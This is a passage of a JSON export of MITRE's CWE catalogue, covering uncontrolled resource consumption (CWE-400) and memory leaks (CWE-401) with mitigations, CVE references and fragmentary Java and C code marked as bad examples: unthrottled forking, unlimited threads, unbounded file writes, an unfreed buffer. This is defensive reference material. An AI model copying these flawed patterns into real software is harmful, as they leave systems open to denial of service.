Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Throws Declaration","attr":{"@_Date":"2008-04-11"}}}},"400":{"attr":{"@_ID":"400","@_Name":"Uncontrolled Resource Consumption","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.","Extended_Description":{"xhtml:p":["Limited resources include memory, file system storage, database connection pool entries, and CPU. If an attacker can trigger the allocation of these limited resources, but the number or size of the resources is not controlled, then the attacker could cause a denial of service that consumes all available resources. This would prevent valid users from accessing the software, and it could potentially have an impact on the surrounding environment. For example, a memory exhaustion attack against an application could slow down the application as well as its host operating system.","There are at least three distinct scenarios which can commonly lead to resource exhaustion:","Resource exhaustion problems are often result due to an incorrect implementation of the following situations:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Lack of throttling for the number of allocated resources","Losing all references to a resource before reaching the shutdown stage","Not closing/returning a resource after processing"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for releasing the resource."]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The most common result of resource exhaustion is denial of service. The software may slow down, crash due to unhandled errors, or lock out legitimate users."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"In some cases it may be possible to force the software to \\"fail open\\" in the event of resource exhaustion. The state of the software -- and possibly the security functionality - may then be compromised."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis typically has limited utility in recognizing resource exhaustion problems, except for program-independent system resources such as files, sockets, and processes. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in spotting resource exhaustion problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find resource exhaustion problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to handle resource exhaustion may be the cause.","Effectiveness":"Opportunistic"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, or","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"Phase":"Implementation","Description":"Ensure that all failures in resource allocation place the system into a safe posture."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Worker implements Executor {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public void execute(Runnable r) {}public Worker(Channel ch, int nworkers) {}protected void activate() {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Thread.currentThread().interrupt();","xhtml:br":["",""],"xhtml:i":"// postpone response"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable loop = new Runnable() {};new Thread(loop).start();","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"for (;;) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable r = ...;r.run();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}}}]}}}},"Body_Text":"There are no limits to runnables. Potentially an attacker could cause resource problems very quickly."},{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket < 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) > 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) > 0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length > 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2874","Description":"Product allows attackers to cause a crash via a large number of connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2874"},{"Reference":"CVE-2009-1928","Description":"Malformed request triggers uncontrolled recursion, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-2121","Description":"TCP implementation allows attackers to consume CPU and prevent new connections using a TCP SYN flood attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2121"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2006-1173","Description":"Mail server does not properly handle deeply nested multipart MIME messages, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1173"},{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Resource exhaustion (file descriptor, disk space, sockets, ...)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":10,"Entry_Name":"Denial of Service"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"492"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, "Protecting Against Denial of Service Attacks" Page 517"}}]},"Notes":{"Note":[{"#text":"\\"Resource consumption\\" could be interpreted as a consequence instead of an insecure behavior, so this entry is being considered for modification. It appears to be referenced too frequently when more precise mappings are available. Some of its children, such as CWE-771, might be better considered as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}},{"attr":{"@_Type":"Other"},"xhtml:p":["Database queries that take a long time to process are good DoS targets. An attacker would have to write a few lines of Perl code to generate enough traffic to exceed the site\'s ability to keep up. This would effectively prevent authorized users from using the site at all. Resources can be exploited simply by ensuring that the target machine must do much more work and consume more resources in order to service a request than the attacker must do to initiate a request.","A prime example of this can be found in old switches that were vulnerable to \\"macof\\" attacks (so named for a tool developed by Dugsong). These attacks flooded a switch with random IP and MAC address combinations, therefore exhausting the switch\'s cache, which held the information of which port corresponded to which MAC addresses. Once this cache was exhausted, the switch would fail in an insecure way and would begin to act simply as a hub, broadcasting all traffic on all ports and allowing for basic sniffing attacks."]}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Name, Relationships, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Exhaustion","attr":{"@_Date":"2008-10-14"}},{"#text":"Uncontrolled Resource Consumption (aka \'Resource Exhaustion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Uncontrolled Resource Consumption (\'Resource Exhaustion\')","attr":{"@_Date":"2019-01-03"}}]}},"401":{"attr":{"@_ID":"401","@_Name":"Missing Release of Memory after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory.","Extended_Description":"This is often triggered by improper handling of malformed data or unexpectedly interrupted sessions. In some languages, developers are responsible for tracking memory allocation and releasing the memory. If there are no more pointers or references to the memory, then it can no longer be tracked and identified for release.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"Memory leaks have two common and sometimes overlapping causes:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances","Confusion over which part of the program is responsible for freeing the memory"]}}}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Most memory leaks result in general software reliability problems, but if an attacker can intentionally trigger a memory leak, the attacker might be able to launch a denial of service attack (by crashing or hanging the program) or take advantage of other unexpected program behavior resulting from a low memory condition."},{"Scope":"Other","Impact":"Reduce Performance"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":["Architecture and Design","Build and Compilation"],"Description":"The Boehm-Demers-Weiser Garbage Collector or valgrind can be used to detect leaks in code.","Effectiveness_Notes":"This is not a complete solution as it is not 100% effective."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following C function leaks a block of allocated memory if the call to read() does not return the expected number of bytes:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getBlock(int fd) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char* buf = (char*) malloc(BLOCK_SIZE);if (!buf) {}if (read(fd, buf, BLOCK_SIZE) != BLOCK_SIZE) {}return buf;","xhtml:br":["","",""],"xhtml:div":[{"#text":"return NULL;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return NULL;","xhtml:br":""}}]}}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3119","Description":"Memory leak because function does not free() an element of a data structure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3119"},{"Reference":"CVE-2004-0427","Description":"Memory leak when counter variable is not decremented.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0427"},{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2005-3181","Description":"Kernel uses wrong function to release a data structure, preventing data from being properly tracked by other code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3181"},{"Reference":"CVE-2004-0222","Description":"Memory leak via unknown manipulations as part of protocol test suite.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222"},{"Reference":"CVE-2001-0136","Description":"Memory leak via a series of the same command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0136"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Memory leak"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Memory Leak"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to deallocate data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC04-J","Entry_Name":"Do not leak memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP38","Entry_Name":"Failure to Release Memory"},{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-14"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-390"}},{"attr":{"@_External_Reference_ID":"REF-391"}},{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-14"}}]},"Notes":{"Note":[{"#text":"This is often a resultant weakness due to improper handling of malformed data or early termination of sessions.","attr":{"@_Type":"Relationship"}},{"#text":"\\"memory leak\\" has sometimes been used to describe other kinds of issues, e.g. for information leaks in which the contents of memory are inadvertently leaked (CVE-2003-0400 is one such example of this terminology conflict).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, References, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated 